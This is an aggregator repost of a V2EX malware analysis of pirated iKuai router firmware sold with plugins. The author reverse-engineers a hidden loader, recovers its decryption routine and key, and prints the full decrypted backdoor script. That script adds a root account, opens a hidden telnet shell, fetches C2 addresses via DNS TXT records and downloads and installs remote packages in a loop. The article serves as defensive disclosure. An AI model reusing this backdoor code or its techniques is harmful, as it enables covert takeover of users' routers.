惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Martin Fowler
Martin Fowler
Webroot Blog
Webroot Blog
博客园 - 叶小钗
阮一峰的网络日志
阮一峰的网络日志
V
V2EX
雷峰网
雷峰网
Apple Machine Learning Research
Apple Machine Learning Research
博客园 - 【当耐特】
Hugging Face - Blog
Hugging Face - Blog
美团技术团队
云风的 BLOG
云风的 BLOG
IT之家
IT之家
S
Secure Thoughts
U
Unit 42
G
GRAHAM CLULEY
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
N
News and Events Feed by Topic
The Cloudflare Blog
月光博客
月光博客
V
Visual Studio Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Schneier on Security
Schneier on Security
O
OpenAI News
Hacker News - Newest:
Hacker News - Newest: "LLM"
P
Privacy International News Feed
The Hacker News
The Hacker News
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
T
Tailwind CSS Blog
SecWiki News
SecWiki News
M
MIT News - Artificial intelligence
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Simon Willison's Weblog
Simon Willison's Weblog
Stack Overflow Blog
Stack Overflow Blog
爱范儿
爱范儿
Last Week in AI
Last Week in AI
C
Check Point Blog
D
Docker
Scott Helme
Scott Helme
Engineering at Meta
Engineering at Meta
博客园_首页
W
WeLiveSecurity
MongoDB | Blog
MongoDB | Blog
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
V
Vulnerabilities – Threatpost
D
Darknet – Hacking Tools, Hacker News & Cyber Security
J
Java Code Geeks
NISL@THU
NISL@THU
S
Security Affairs
C
Cybersecurity and Infrastructure Security Agency CISA
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More

宽带症候群

搓搓(cuocuo)隧道 机场专用客户端如何抓取节点 用了好多年的机场(梯子)就快停止服务了,求大家推荐一些价格实惠的机场或者梯子 V2EX › 登录 [开源] 中兴路由器 Web 后台全系增强插件 联通宽带速率不达标 现在这个形势,推荐备一个 CMHK 的流量卡 湖北电信宽带免费提速活动 对上海联通限速的观察和讨论 lucky 2 的卡,查询 ip 的时候是在香港,但是网站识别到的地区似乎在日本 求推荐对 claude code, chatgpt 友好的联网方法 如何在国内受限网络环境下使用官方 claude 或 codex 等模型? 随身 wifi 有推荐的吗,流量大的。 异地组网方案怎么选?从 n2n 到 WireGuard,折腾一圈后的真实记录 海鲜市场花 1700 大洋买了个苏州电信的老号 一个 ipv6 /64 被电信屏蔽,联通移动全绿电信全红,这是新型的运营商墙么? holafly esim 在国内数据漫游 国内 ipv6 的 ddns 已经完全失效了吗? 家庭环境下,屏蔽线怎么接地,单端还是双端 [宽带症候群] 求助-开了 v2rayA,家里面上不了网了 阿里云轻量服务器用来做加宽中转实际会被 ban 吗? 这段时间移动网络是不是很差? 为啥短信还在收费 咨询一个 iptv 的问题 最近几周发现 webdav 没用了 今天仔细一查发现疑似运营商阻断了? 中兴星云 POE 套装怎么样,有大佬用过吗 准备自己搭一套全屋 WiFi,方案基本确定,但在软路由和部署方式上有点纠结,想请教下有经验的朋友 豆瓣在广东电信的解析是不是又崩了 翻墙后的手机怎么把热点共享出去也让其他设备能翻墙上网 你们有没有遇到过,通过梯子看 youtube 高清视频的时候,竟然会导致全家的 wifi 异常断开 局域网内 ping 电视丢包。这个一般啥原因啊? 感觉 iOS 的一些软件后台(保活)也挺流氓的,(锁屏)切到后台跑 PCDN 流量问题 广东珠海推荐办哪个运营商的宽带 一个连接数的问题求助 [转载] 某顶级机场公告! 4/25 号联通线路好像丢包延迟严重 关于部分地区“白名单”有何绕行方案? passwall2 如何实现真正的 TUN 全局模式 豆瓣域名 CDN 又出问题 求个 OpenClash 详细设置教程 4-6 个 2.5G, 2 个 10G SFP+的软路由,搜到有好几家在卖,那个厂家做工可以? 湖南联通大规模上行限速 想使用 ARM 软路由,套路由器当 AP,已有 NAS,不跑重服务,大家都用的什么机器? 记录: clash-meta 配置 ss 回连访问局域网设备 怀疑移动的拦截我的数据流量,我的梯子延迟测试常常 timeout 昨天移动线路好像让魔法失效了 昨天开始广东深圳地区是不是墙变高了 昆明国际通信业务出入口局将于今年全面投入运营 宽带一年流量消耗 深圳电信,把 myqnapcloud.com 解析到 127.0.0.1 广州地区, 2026 年宽带选联通还是移动呢 爱快 iKuai 科学上网新思路,扔掉旁路由! 230 块钱一个月的专线商宽,有坑吗? 广西电信公网 IP 用户又被打电话要求备案或者断网 nas docker 部署的 qbittorrent 没有速度怎么解决? 成都联通,上周开始有公网 ip 的宽带,平均 20 分钟断线一次 - V2EX 针对 VPN 的整治行动将会有所放松,已影响上海、浙江、福建、广东等地的外贸商家 求推荐支持 VLAN、多 SSID、跨 AP 漫游的 WiFi AP 安卓手机 sing-box 和 tailscale 共存配置参考 Tailscale 连国外 homelab 上海联通似乎上很猛的 qos 限速了 UDP 上行限速,真是运营商最阴损的德行了,槽! 刚刚自建的,目前自己在用,网速还不错 [求助] 为什么浏览器重启就才能顺利翻墙? 移动的上传真的有 1TB 达量限速吗? 如何让美国朋友把家宽 IP 分享给我? 有在大马的朋友吗? 问个运营商问题 TP-LINK 路由器桥接模式下 IPv6 配置问题 同省跨运营商之前全天限速现在似乎变成晚高峰限速了 - V2EX 告别 ALLinBOOM,用 VRRP 为折腾旁路由保驾护航 开了上海联通国际加速之后的问题 - V2EX 联通第一年免费,第二年一月 10 元,有没有坑? 包你每月宽带费 or 补贴,寻美国居民/留学生合作共享网络 内网穿透新方案? Cloudflare Mesh 号称是比肩 tailscale 大佬们,问个 clash 代理的规则问题 在哪里买的静态 ip 比较稳 江苏联通宽带被限制上行 2Mbps,今天已解除 10 天被联通限速 3 次。 用人民币面额,记忆视频流量 上海移动专线故障 电信谈心核心是不是就是:你不给便宜我就转网? 上海求付费远程/上门协助: OpenWrt 软路由 + 固定美国出口 + 现有机场优化 推荐一个可以完美运行小猫咪的 5G 路由器 关于境外卡在国内漫游 tplink 路由器关闭 ipv6 防火墙风险大吗 大佬们 TEWA-7101U 这样的光猫 如何获取超管密码? fast.com 居然比 https://10000.gd.cn/#/speed 还快 广东电信, ipv4 公网,访问海外 ip 全都不通, ipv6 还勉强能通 江苏联通商宽限速 哪家有稳定的家宽啊,做 TikTok shop 用的 ipw.cn 无法访问 各位佬们,有没有小的交换机推荐 江苏联通全局限速但不承认如何破局? 联通对某些 UDP 端口有特殊优化? 这两天晚上连甲骨文云日本节点非常卡,测了一下联通和电信间的速度只有 4Mbps 左右 中年人要开始折腾家用网络了,帮忙 review 一下,三方案选一,提出合理的建议 Moonlight 链接家里的电脑打游戏,突然就连上画面不刷新 4g 手机卡还有多少朋友在用 关于成都移动 66 元融合套餐和电信携号转网的疑问
爱快软路由 ikuai 开心版 带插件固件完整分析
Nyarime · 2026-04-19 · via 宽带症候群
前阵子在恩山看到有用户在宣传 iKuai 插件版,价格几百一个授权还提供一个 7 天试用的密钥。嚯,一看一堆插件支持,其中还有疑似 Clash 的小猫咪。当然我很感谢他们让我把软路由玩爽了,一想爱快云平台只有那 1 个冷冰冰的 Docker 就不寒而栗... 他们的闲鱼 ID 分别是:公路暴走的榛子、伦敦天蝎座海牛。还有个曾用名:金陵巨蟹座佩奇(他们有多个某鱼小号注意鉴别马甲),至于他们的固件比爱快官方还要 bt ,这些贩子销售所谓的 iKuai"企业版"固件,声称包含 Docker 、Shell 等企业版功能。实际上,这些固件通过植入后门程序实现插件加载,同时在用户路由器上留下多个后门账户。 本文完整记录了逆向分析过程。 1. 固件提取 1.1 获取 rootfs # 使用 Nyarc 解密 iKuai 固件 nyarc --ikuai-decrypt firmware.bin -o decrypted.xz # 解压 XZ (必须 CRC32 ) xz -d decrypted.xz # 挂载 ext2 rootfs mkdir /tmp/xyrm mount -o loop decrypted /tmp/xyrm 1.2 发现异常文件 # 标准 iKuai 不应该有这个文件 ls -la /tmp/xyrm/sbin/replace_files # -rwxr-xr-x 1 root root 42240 ... replace_files ls -la /tmp/xyrm/sbin/appinst.bin.pkg # -rw-r--r-- 1 root root 26288 ... appinst.bin.pkg (Salted__加密) 1.3 Nyarc 安全扫描发现后门 nyarc --scan /tmp/xyrm 输出(节选): [CRITICAL] Hardcoded Password /etc/shadow: 3 个异常账户 root:$1$...:17857 ← 后门密码 sshd:$1$...:17857 ← 后门密码 iksshd:$1$...:17857 ← 后门账户(标准 iKuai 无此用户) [CRITICAL] Backdoor Detected /sbin/replace_files: 42KB ELF, 非标准 iKuai 文件 🟠 [HIGH] Telnet Backdoor /etc/setup/rc: telnetd -p 65500 -l /bin/ash ← 隐藏 Telnet 后门,端口 65500 2. replace_files 逆向 2.1 基本信息 file /tmp/xyrm/sbin/replace_files # ELF 64-bit LSB executable, x86-64, statically linked strings /tmp/xyrm/sbin/replace_files | grep -i "bash\|script\|tmp" # /bin/bash -s # /tmp/script_out_ # /tmp/script_err_ # kworker/u8:1-ev ← 伪装成内核线程! 关键发现: 静态链接 ELF ,42KB 通过 /bin/bash -s 执行嵌入的脚本 伪装进程名为 kworker/u8:1-ev (模仿内核工作线程) 输出重定向到 /tmp/script_out_XXXXXX 2.2 Ghidra 反编译 使用 Ghidra headless 模式反编译: # 导入并分析 analyzeHeadless /tmp/ghidra_rf rf_proj -import replace_files # 反编译所有函数 analyzeHeadless /tmp/ghidra_rf rf_proj -process replace_files \ -postScript DecompileAll.java 2.3 核心函数分析 main 入口( FUN_0040168a ) void FUN_0040168a(undefined4 param_1, undefined8 *param_2) { // 1. 伪装进程名 uVar1 = FUN_00405a20(*param_2); FUN_00405aa0(*param_2, "kworker/u8:1-ev", uVar1); // 2. 解密嵌入的脚本 FUN_004016e8(&DAT_0040b0a0, &DAT_0040a040, 0xdd1); // ^输出缓冲区 ^加密数据 ^长度=3537 字节 // 3. 执行解密后的脚本 FUN_004010e9(&DAT_0040b0a0, param_1, param_2); } 解密函数( FUN_004016e8 )— 核心! void FUN_004016e8(long output, undefined8 encrypted_data, uint data_len) { // 1. 生成 1024 字节查找表(类似 iKuai rootfs 的 sbox !) for (i = 0; i < 0x400; i++) { sbox[i] = key[i & 0xf] + ((char)(i + 1) * -0x22); // ^16 字节密钥 ^乘以-0x22(即-34) } // 2. 逐字节解密:减法 + 位旋转 for (i = 0; i < data_len; i++) { bVar4 = (sbox[i & 0x3ff] + (char)data_len) & 0xFF; // 计算旋转位数:bVar4 % 7 + 1 // Ghidra 显示的是编译器优化后的除法(乘 0x25 右移 8 ) cVar1 = (bVar4 * 0x25) >> 8; div7 = (cVar1 + ((bVar4 - cVar1) >> 1)) >> 2; shift = bVar4 - div7 * 7 + 1; // 解密操作:减去 bVar4 ,然后左旋转 shift 位 data[i] = ROL((data[i] - bVar4) & 0xFF, shift); } } 2.4 密钥提取 从 ELF 的数据段提取: with open('replace_files', 'rb') as f: elf = f.read() # 解析 ELF program headers 找到文件偏移 # DAT_0040ae20 (虚拟地址) → 0x9e20 (文件偏移) # DAT_0040a040 (虚拟地址) → 0x9040 (文件偏移) key = elf[0x9e20:0x9e20+16] # 密钥: 88b1f1937a2cb39d5383953eb38a5368 encrypted_data = elf[0x9040:0x9040+0xdd1] # 3537 字节加密数据 2.5 Python 解密实现 key = elf[0x9e20:0x9e20+16] enc_data = bytearray(elf[0x9040:0x9040+0xdd1]) data_len = 0xdd1 # 3537 # 生成 sbox sbox = bytearray(1024) for i in range(1024): sbox[i] = (key[i & 0xf] + ((i + 1) * (-0x22 & 0xFF))) & 0xFF # 解密 dec = bytearray(len(enc_data)) for i in range(len(enc_data)): bVar4 = (sbox[i & 0x3ff] + (data_len & 0xFF)) & 0xFF # shift = bVar4 % 7 + 1 (编译器优化还原) cVar1 = (bVar4 * 0x25) >> 8 div7 = (cVar1 + ((bVar4 - cVar1) >> 1)) >> 2 shift = (bVar4 - div7 * 7 + 1) & 0x1F # 解密:减去 bVar4 ,然后 ROL val = (enc_data[i] - bVar4) & 0xFF val = ((val << shift) | (val >> (8 - shift))) & 0xFF dec[i] = val print(bytes(dec).decode()) 3. 解密后的后门脚本 完整解密输出( 3537 字节 bash 脚本): #!/bin/bash # ===== 后门 1: 添加 SSH 后门账户 ===== iksshd=`cat /etc/shadow|grep "iksshd"|wc -l` if [ $iksshd -eq 0 ];then echo 'iksshd:$1$ebBzICAY$5CaSyktzPh8SEUYMHdzhf1:17857:0:99999:7:::' >>/etc/shadow echo 'iksshd:x:0:0:iksshd:/root:/bin/ash' >>/etc/passwd fi # iksshd 账户: UID=0(root 权限), 密码 hash 已知 # ===== 后门 2: C2 通信 ===== check_network() { while true; do ping -c2 qq.com >/dev/null 2>&1 && break ping -c2 163.com >/dev/null 2>&1 && break ping -c2 baidu.com >/dev/null 2>&1 && break sleep 5 done } # ===== 后门 3: 远程控制服务器 ===== REG_SERVER="patch.ikuai8.cn" # 伪装成 iKuai 官方域名 REG_SERVER2="www.ikuai8.cn" # 备用 oss_cn_beijing="https://ikuai8-app.oss-cn-beijing.aliyuncs.com" wget_file(){ # 通过 DNS TXT 记录获取真实 C2 地址 regaddr=$(curl -s "https://doh.pub/dns-query?name=${REG_SERVER}&type=TXT" \ | jq -r '.Answer[].data' | sed -E 's/"//g') # 备用 DNS if [ -z "$regaddr" ]; then regaddr=$(curl -s "https://dns.alidns.com/resolve?name=${REG_SERVER2}&type=TXT" \ | jq -r '.Answer[].data' | sed -E 's/"//g') fi # 最终备用:硬编码动态 DNS if [ -z "$regaddr" ]; then regaddr="http://bdoptical2.vicp.cc:8081" fi # 通过 C2 服务器签名 OSS URL SIGNED_SER="$regaddr/generate_signed_url.php?url=" SIGNED_URL=$(curl -s "$SIGNED_SER$oss_cn_beijing/$1") echo $SIGNED_URL } # ===== 后门 4: 无限循环下载+安装插件 ===== while true; do check_network sleep 15 # 下载版本信息 downloaded_version=`curl -sL $(wget_file "appinst_ver/version_rom")` # 下载 pmd 数据库(加密的 JSON ) wget -O /tmp/iktmp/app_up/db \ $(wget_file "appinst_ver/appinst_$downloaded_version") -q # 下载插件包( AES 加密的 tar.gz ) wget -O /tmp/iktmp/app_up/appinst.bin.pkg \ $(wget_file "appinst_ver/appinst_$downloaded_version.bin.ikp") -q if [ -s /tmp/iktmp/app_up/db ] && [ -s /tmp/iktmp/app_up/appinst.bin.pkg ]; then # 覆盖 pmd 数据库 cp /tmp/iktmp/app_up/db /etc/log/packages/db/.__DB.3.x86_64 # 放置插件包 cp /tmp/iktmp/app_up/appinst.bin.pkg /etc/log/packages/appinst.bin.pkg # 重启 pmd ( iKuai 插件管理器)强制加载 killall pmd rm /tmp/packages -r pmd sleep 30 fi # 安装成功则退出,否则永远重试 if [ -f /tmp/ikpkg/appinst/version ]; then exit fi # 清理重试 rm /etc/log/packages/*.pkg -f done 4. 后门清单 # 类型 详情 危害等级 1 SSH 后门账户 iksshd (UID=0, root 权限) 严重 2 Telnet 后门 端口 65500, /bin/ash 严重 3 进程伪装 伪装为 kworker/u8:1-ev 内核线程 高 4 C2 通信 DNS TXT 查询获取控制服务器地址 严重 5 远程下载 从阿里云 OSS 下载任意代码执行 严重 6 pmd 注入 覆盖官方插件数据库加载恶意插件 严重 7 无限循环 后门脚本永不退出,持续尝试 高 8 禁用 bash /etc/setup/rc 中移除 bash ,防止用户排查 中 C2 基础设施 patch.ikuai8.cn → DNS TXT → 真实 C2 地址 www.ikuai8.cn → 备用 DNS TXT bdoptical2.vicp.cc:8081 → 硬编码备用 C2 (花生壳动态域名) ikuai8-app.oss-cn-beijing.aliyuncs.com → 插件存储(阿里云 OSS ) C2 服务器功能: /generate_signed_url.php → 生成 OSS 签名下载链接 5. 加密算法对比 replace_files vs iKuai rootfs 特性 replace_files iKuai rootfs 算法 自定义 sbox+位旋转 自定义 sbox+XOR 密钥长度 16 字节 16 字节 sbox 大小 1024 字节 256 字节(uint32 溢出) 操作 减法+ROL XOR 密钥存储 ELF 数据段 vmlinuz/rootfs 末尾 两者思路一致:生成查找表→逐字节变换。可能是同一作者/团队。 6. Nyarc 自动化检测 Nyarc 可以自动检测此类后门: # 固件检测 nyarc --fw-detect xianyu_firmware.bin # → iKuai 3.7.x (modified) # 安全扫描 nyarc --scan /path/to/rootfs # → CRITICAL: Hardcoded password in /etc/shadow # → CRITICAL: Unknown ELF in /sbin/replace_files # → HIGH: Telnet on non-standard port 65500 # 加密分析 nyarc --crypto-scan /sbin/replace_files # → Custom encryption detected (sbox + rotation) # 完整报告 nyarc --report xianyu_firmware.bin report.txt 7. 工具 Nyarc : 固件分析工具 Ghidra : NSA 逆向工程框架 — ELF 反编译 Python : 解密脚本实现 本文仅发布于 V2EX 使用 Nyarc v1.0.0 + Ghidra 11.3.2 测试